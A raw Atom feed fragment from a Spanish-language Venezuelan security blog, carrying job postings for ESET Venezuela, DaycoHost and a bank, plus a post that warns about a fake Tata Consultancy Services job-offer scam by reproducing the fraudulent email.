necesidades y/o requerimientos de clientes.&lt;br /&gt;&lt;br /&gt;·        Desarrollar ofertas de venta, evaluarlas conjuntamente con el cliente en los casos que se requiere.&lt;br /&gt;&lt;br /&gt;·        Documentar la participación en procesos licitatorios que son de interés para la compañía.&lt;br /&gt;&lt;br /&gt;·        Identificar oportunidades de venta y servicios con los clientes actuales y nuevos clientes.&lt;br /&gt;&lt;br /&gt;·        Construir la relación comercial con los clientes internos y externos.&lt;br /&gt;&lt;br /&gt;·        Elaborar y coordinar la planificación de nuevas estrategias siempre que sea necesario, con el objeto de abordar de manera efectiva cada caso potencial de negocio.&lt;br /&gt;&lt;br /&gt;·        Desarrollar planes individuales de venta, con el propósito de concretar oportunidades de negocio que son atípicas y que vienen a ser un valor adicional para la compañía dado que representa la posibilidad de expansión a otras áreas de servicios.&lt;br /&gt;&lt;br /&gt;·        Efectuar análisis de oportunidades a fin de identificar nuevos servicios, productos y aplicaciones a ofrecer.&lt;br /&gt;&lt;br /&gt;·        Efectuar la gestión en la etapa de pre-venta: Levantamiento de información, analizar las solicitudes y necesidades planteadas por el cliente a fin de elaborar la propuesta de negocios.&lt;br /&gt;&lt;br /&gt;·        Coordinar a nivel administrativo y operativo los servicios implantados en clientes.&lt;br /&gt;&lt;br /&gt;·        Proveer al departamento de administración la información necesaria para la elaboración de la facturación correspondiente a cada servicio.&lt;br /&gt;&lt;br /&gt;·        Elaborar y exponer las presentaciones que sustentas las ofertas de servicio, para lo cual puede apoyarse en otras unidades funcionales del negocio.&lt;br /&gt;&lt;br /&gt;·        Realizar cualquier otra actividad inherente a su cargo de acuerdo a la normativa de la Empresa.&lt;br /&gt;&lt;br /&gt;PAQUETE SALARIAL&lt;br /&gt;Sueldo Base A convenir&lt;br /&gt;Bono de productividad en base a comisiones de ventas&lt;br /&gt;Seguro HCM&lt;br /&gt;Bono de Alimentación  &lt;br /&gt;&lt;br /&gt;Interesados enviar su resumen curricular a la siguiente dirección   &lt;a href=&quot;mailto:empleo@eset.com.ve&quot;&gt;empleo@eset.com.ve&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2.- Analista de Soporte Técnico nivel 2:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;REQUISITOS:&lt;br /&gt;Sexo masculino&lt;br /&gt;edad entre 22 y 30 años&lt;br /&gt; Ingeniero o TSU en el área de sistemas, informática o electrónico &lt;br /&gt;Residenciado en Caracas&lt;br /&gt;Vehículo propio ( preferiblemente)&lt;br /&gt;&lt;br /&gt;CONOCIMIENTOS EN:&lt;br /&gt;Manejo de protocolo TCP/IP &lt;br /&gt;Conocimientos sobre protocolos de red &lt;br /&gt;Conocimiento de VPN&lt;br /&gt;Manejo de O.S Windows Server, 10, 8, 7 y Linux&lt;br /&gt;Conocimientos deseados de:&lt;br /&gt;-       Normas y estándares de Seguridad de la información&lt;br /&gt;-       Elaboración de políticas y procedimientos&lt;br /&gt;-       Control de Acceso Lógico&lt;br /&gt;-       Protección de perímetro: Firewalls, Proxys, IDS/IPS.&lt;br /&gt;-       Herramientas para Control de Contenido&lt;br /&gt;-       Administración de Consolas Antivirus y Anti-Spam&lt;br /&gt;-       Capacidad para documentar procesos, incidentes e informes técnicos.&lt;br /&gt;&lt;br /&gt;PAQUETE SALARIAL&lt;br /&gt;Sueldo Base A convenir&lt;br /&gt;Bono de productividad &lt;br /&gt;Seguro HCM&lt;br /&gt;Bono de Alimentación  &lt;br /&gt;&lt;br /&gt;Interesados enviar su resumen curricular a la siguiente dirección   &lt;a href=&quot;mailto:empleo@eset.com.ve&quot;&gt;empleo@eset.com.ve&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/5514254647123055407/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2017/08/oferta-de-trabajo-seguridad-informatica.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5514254647123055407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5514254647123055407'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2017/08/oferta-de-trabajo-seguridad-informatica.html' title='Oferta de Trabajo- Seguridad Informática- ESET Venezuela'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxs89AGwJhF_MruO5oI2yI6oESnUQVn6g-d36o5jJcdpr1MIDt1HQRTqk_LCNJ1ZM9IqEkcOsEUff4V1ccBF36WSSmru-JsloW-Tz9ElfEMGU8VXq2NvtQKjtj2tJEPNs40JiRPSCxZgk/s72-c/ESET+de+Venezuela.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-2907910079246447345</id><published>2017-02-16T11:25:00.002-04:00</published><updated>2017-02-16T11:25:59.422-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><title type='text'>Buscamos Especialista en Seguridad Información</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic476i5I_nKrGvimmUL97PW0ZKmD-nb2nMkSQ_8OHBFjv7P7D39HrvndqJa-Ch7cXtEj_2aYU78LcdThW_h-OYO7sLRNd0G4XF0n58QAmLb7r8hbZeQj3OhYw_ZvBiyKIeFXeJ5DvC1_w/s1600/seguridad.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;434&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic476i5I_nKrGvimmUL97PW0ZKmD-nb2nMkSQ_8OHBFjv7P7D39HrvndqJa-Ch7cXtEj_2aYU78LcdThW_h-OYO7sLRNd0G4XF0n58QAmLb7r8hbZeQj3OhYw_ZvBiyKIeFXeJ5DvC1_w/s640/seguridad.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Se requieren 2 especialistas de Seguridad de la Información para DaycoHost. Contactar a &lt;a href=&quot;mailto:terrerosv@daycohost.com&quot;&gt;terrerosv@daycohost.com&lt;/a&gt; y enviar resúmen curricular&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/2907910079246447345/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2017/02/buscamos-especialista-en-seguridad.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2907910079246447345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2907910079246447345'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2017/02/buscamos-especialista-en-seguridad.html' title='Buscamos Especialista en Seguridad Información'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic476i5I_nKrGvimmUL97PW0ZKmD-nb2nMkSQ_8OHBFjv7P7D39HrvndqJa-Ch7cXtEj_2aYU78LcdThW_h-OYO7sLRNd0G4XF0n58QAmLb7r8hbZeQj3OhYw_ZvBiyKIeFXeJ5DvC1_w/s72-c/seguridad.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-6518839932638427326</id><published>2016-12-16T17:58:00.000-04:00</published><updated>2016-12-16T17:58:49.049-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Fraude"/><title type='text'>Falsa oferta de empleo por ciberdelincuentes en Internet</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;ii gt adP adO&quot; id=&quot;:6ak&quot; style=&quot;background-color: white; color: #222222; direction: ltr; font-family: arial, sans-serif; margin: 5px 15px 0px 0px; padding-bottom: 5px; position: relative;&quot;&gt;
&lt;div class=&quot;a3s aXjCH m1590986d43fb0278&quot; id=&quot;:6ai&quot; style=&quot;overflow: hidden;&quot;&gt;
&lt;div dir=&quot;ltr&quot;&gt;
&lt;div class=&quot;gmail_extra&quot;&gt;
&lt;div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhmlGWfYA59vfYjDJ1ivQgMivYjBzGqA_5suqlyaCp4qRuF8HTUYHV2UguVzosU5OiR2tQgs4VdVgXjuXNtOMmanhYDoAZ3eOq84cAGiePdntYfaV2-kml470OZOQKsYDbLf_owA2jwjc/s1600/internet-estafas-415x260.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhmlGWfYA59vfYjDJ1ivQgMivYjBzGqA_5suqlyaCp4qRuF8HTUYHV2UguVzosU5OiR2tQgs4VdVgXjuXNtOMmanhYDoAZ3eOq84cAGiePdntYfaV2-kml470OZOQKsYDbLf_owA2jwjc/s320/internet-estafas-415x260.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;box-sizing: border-box; color: #59646d; font-family: Arial, Helvetica, Verdana, sans-serif; margin-bottom: 1em; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u style=&quot;box-sizing: border-box;&quot;&gt;Gancho utilizado&lt;/u&gt;: Te ofrecen el trabajo ideal para trabajar en el extranjero. Buenas condiciones laborales y buen salario. ¡No lo puedes rechazar!&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; color: #59646d; font-family: Arial, Helvetica, Verdana, sans-serif; margin-bottom: 1em; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u style=&quot;box-sizing: border-box;&quot;&gt;¿Dónde está el fraude?&lt;/u&gt;: Antes o después, acaban solicitando el ingreso de una cantidad de dinero bajo excusas como: gastos de gestión del contrato, gestión del billete de avión, etc.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; color: #59646d; font-family: Arial, Helvetica, Verdana, sans-serif; margin-bottom: 1em; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Correo que te llega a tu cuenta, con el &lt;a href=&quot;https://drive.google.com/open?id=0B5plBKL3Nn-aWG1DR2hnNjA0aG8&quot; target=&quot;_blank&quot;&gt;anexo&lt;/a&gt;&amp;nbsp;donde te solicitan que deposites&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #222222; font-family: &amp;quot;arial&amp;quot; , sans-serif; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;$683.00&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;T&lt;/span&gt;&lt;span style=&quot;font-size: 12.8px;&quot;&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;ATA CONSULTANCY SERVICES (TCS)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12.8px;&quot;&gt;&lt;i&gt;North American Headquarters&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #0b5394; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 12.8px;&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;No.101 Park Avenue, 26th Floor&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;New York, NY 10178, USA&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;E-mail:&amp;nbsp;&lt;a href=&quot;mailto:hr@tcsplacement.com&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;hr@tcsplacement.com&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Tel:&amp;nbsp;+1&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;707 370 5165&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold; text-align: right;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Date: 16 - 12 - 2016&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 26px; font-weight: bold; text-align: right;&quot;&gt;
&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: #0b5394; font-size: 26px; font-weight: bold;&quot;&gt;&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;Dear, Applicant&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 26px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;color: #0b5394; font-size: 12.8px; font-weight: 400;&quot;&gt;Warm greetings from the entire management of Tata Consultancy Services ( TCS ).&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;At TCS, we believe that our people are our competitive edge. If you have the passion for excellence and seek a fulfilling career.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;We are committed to innovative growth, through our personal passion, reinforced by a professional mindset, creating value for all those we touch, by changing the way the world works.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Join us and attend our in person interview for a career opportunity that will take you further than you ever imagined.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Enclosed file is your employment interview call letter .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;We await your response.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Best wishes!!,&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;span style=&quot;color: #0b5394;&quot;&gt;Dr. Karem Orlando Jr.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 12.8px;&quot;&gt;
&lt;span style=&quot;color: #0b5394;&quot;&gt;(Sr.&amp;nbsp;Human Resource Manager)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Human Resource - Tata Consultancy Services&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;..............................&lt;wbr&gt;&lt;/wbr&gt;..............................&lt;wbr&gt;&lt;/wbr&gt;..............................&lt;wbr&gt;&lt;/wbr&gt;.............&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Disclaimers: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: 15.21px; font-weight: bold;&quot;&gt;
&lt;span style=&quot;font-size: 12.8px; font-weight: normal;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;&lt;i&gt;..............................&lt;wbr&gt;&lt;/wbr&gt;..............................&lt;wbr&gt;&lt;/wbr&gt;....&lt;/i&gt;..........................&lt;wbr&gt;&lt;/wbr&gt;.............&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: 12.8px;&quot;&gt;&lt;span style=&quot;color: #0b5394;&quot;&gt;Copyright © 2004-16 Tata Consultancy Services. All rights reserved&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;yj6qo&quot; style=&quot;font-size: 12.8px;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;hq gt a10&quot; id=&quot;:6dc&quot; style=&quot;background-color: white; clear: both; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; margin: 15px 0px;&quot;&gt;
&lt;div class=&quot;hp&quot; style=&quot;border-top: 1px dotted rgb(216, 216, 216); height: 0px; width: 824px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;hp&quot; style=&quot;border-top: 1px dotted rgb(216, 216, 216); height: 0px; width: 824px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;hp&quot; style=&quot;border-top: 1px dotted rgb(216, 216, 216); height: 0px; width: 824px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;hp&quot; style=&quot;border-top: 1px dotted rgb(216, 216, 216); height: 0px; width: 824px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;hp&quot; style=&quot;border-top: 1px dotted rgb(216, 216, 216); height: 0px; width: 824px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;a3I&quot; style=&quot;height: 1px; left: -10000px; overflow: hidden; position: absolute; top: -10000px; width: 1px;&quot;&gt;
Zona de los&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/6518839932638427326/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/12/falsa-oferta-de-empleo-por.html#comment-form' title='24 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6518839932638427326'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6518839932638427326'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/12/falsa-oferta-de-empleo-por.html' title='Falsa oferta de empleo por ciberdelincuentes en Internet'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhmlGWfYA59vfYjDJ1ivQgMivYjBzGqA_5suqlyaCp4qRuF8HTUYHV2UguVzosU5OiR2tQgs4VdVgXjuXNtOMmanhYDoAZ3eOq84cAGiePdntYfaV2-kml470OZOQKsYDbLf_owA2jwjc/s72-c/internet-estafas-415x260.jpg" height="72" width="72"/><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-5175553863447282140</id><published>2016-12-07T16:25:00.001-04:00</published><updated>2016-12-07T16:34:53.519-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><title type='text'>Vacante en Banco Occidental de Descuento (BOD)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5LhsBdXQvfAl596A8gZ-N133t7LJMV9AcVwOd8s4cWD5ES9AcYqSYaosUYAdQnUJsBbpPndc5UrtqtDz2n7Y91wOgWCKtNmWKnORyZ_2M6AsZ1MHe9ybj6gZHxpIyqbqsPxILYZmq-s/s1600/empleos.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;444&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5LhsBdXQvfAl596A8gZ-N133t7LJMV9AcVwOd8s4cWD5ES9AcYqSYaosUYAdQnUJsBbpPndc5UrtqtDz2n7Y91wOgWCKtNmWKnORyZ_2M6AsZ1MHe9ybj6gZHxpIyqbqsPxILYZmq-s/s640/empleos.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
